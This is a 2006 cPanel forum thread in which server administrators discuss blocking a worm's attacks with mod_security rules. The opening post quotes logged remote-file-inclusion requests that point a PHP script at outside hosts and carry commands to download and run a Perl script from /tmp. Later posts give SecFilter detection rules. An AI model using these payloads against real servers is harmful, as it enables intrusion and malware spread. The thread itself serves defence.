The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

need help with mod-security to prevent atttacks from specific websites.

Discussion in 'Security' started by neonix, Feb 10, 2006.

  1. neonix

    neonix Well-Known Member

    Joined:
    Oct 21, 2004
    Messages:
    124
    Likes Received:
    2
    Trophy Points:
    0
    Hi,

    Mod-security is blocking a wave of attacks from different I.P's trying to download malicious files from www.thriftysix.co.uk, www.freewebs.com and www.sporadical.org.

    Blocking I.P's do not work as the attackers keep on changing I.P's but the websites from where they are trying to download these tools remain the same. How do I blacklist these websites completely...I have a RHEL/cpanel server. Thanks for your help and advise.

    202.133.209.67 2006-02-11 05:48:42 /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thriftysix.co.uk/tool25.txt?&cmd=cd%20/tmp/;wget%20http://www.thriftysix.co.uk/logs.txt;perl%20logs.txt;rm%20-rf%20logs.txt*? HTTP/1.0 www.xxx.net Access denied with code 406. Pattern match "wget " at THE_REQUEST 406

    220.245.178.132 2006-02-11 05:46:47 /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/sess2006/tool.gif?&cmd=cd%20/tmp/;GET%20http://freewebs.com/sess2006/sess3023_%20>%20sess3023_;perl%20sess3023_;rm%20-rf%20sess3023*? HTTP/1.0 www.xxxx.net Access denied with code 406. Pattern match "Mozilla/(4|5)\\.0$" at HEADER("USER-AGENT") 406

    202.133.209.67 2006-02-11 05:44:37 /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sporadical.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://www.sporadical.org/xxd.txt;perl%20xxd.txt;rm%20-rf%20xxd.txt*? HTTP/1.0
     
  2. rustelekom

    rustelekom Well-Known Member
    PartnerNOC

    Joined:
    Nov 13, 2003
    Messages:
    290
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    moscow
    will be better if you just block wget, cd and other system commands.
    BTW - you may just download newest mod_security rules from official modescurity.org site.
     
  3. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Block the type of attack.

    SecFilter "mosConfig_absolute_path" would even do it.

    Also, check around the forums for posts / threads by me with my rules, this one is in there long ago.

    Unfortunately, since this is a worm and spreads itself using the servers it has infected, you can either ask your data center to drop traffic at the router for each IP, or sit it out, and empty your audit_log, once in a while :)

    But the main thing about this attack that can be squashed, regardless of what the command they run is (What if it's not wget) is:

    SecFilter "mosConfig_absolute_path"
     
  4. verdon

    verdon Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    836
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    Northern Ontario, Canada
    cPanel Access Level:
    Root Administrator
    I added my audit_log to logrotate... that helps
     
  5. neonix

    neonix Well-Known Member

    Joined:
    Oct 21, 2004
    Messages:
    124
    Likes Received:
    2
    Trophy Points:
    0
    Kris,

    The reason mod-security has been blocking these attacks; is that I have been using your rules :D

    Do you have a 'rule' to blacklist some websites completely...to prevent any scripts being downloaded/run from there... as an added precaution.

    Thanks for your help!

    # Added Jan 20 by kris from honeypot domlogs - Brand new Rootkits etc
    SecFilter "mosConfig_absolute_path"
    SecFilterSelective THE_REQUEST "tool\.gif"
    SecFilterSelective THE_REQUEST "tool25\.txt"
    SecFilter "perl\x20xx\.txt"
    SecFilter "sweet-serenity\.org"
    SecFilterSelective THE_REQUEST "sess3025"
    SecFilter "mosConfig_absolute_path=http"
    SecFilter "echo\x20YYY"
    SecFilter "cmd\.gif?"
    SecFilter "\x20bash;"
    SecFilter "200\.72\.130\.29"
    SecFilter "200\.207\.91\.25"
    SecFilter "62\.23\.221\.67"
    SecFilter "147\.142\.142\.24"
    SecFilter "62\.23\.221\.67 "
    SeCFilter "202\.143\.140\.151"
    SecFilterSelective THE_REQUEST "killop"
    SecFilterSelective THE_REQUEST "\/bash;chmod"
     
  6. ShockHosts

    ShockHosts Well-Known Member

    Joined:
    Nov 25, 2005
    Messages:
    123
    Likes Received:
    0
    Trophy Points:
    16
    Just about the link... It is http://modsecurity.org just incase noone knew...

    Find the attackers hostname (palmer.comcast.net) and try block that with iptables or something..
     
  7. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    It's a rootkit that's spread, so if anything, you'd block the website it's accessing. Since it spreads rapidly no way of knowing the possible attacking IPs, but if they only use a pool of 5-6 websites (sporadical.org) etc it's easy to block them.

    Glad to get some thanks for my security rules :)

    This would even work, but haven't tried it as it (MIGHT) block some legimate items.

    SecFilter "cmd=cd"
     
    #7 HostMerit, Feb 15, 2006
    Last edited: Feb 15, 2006
Loading...

Share This Page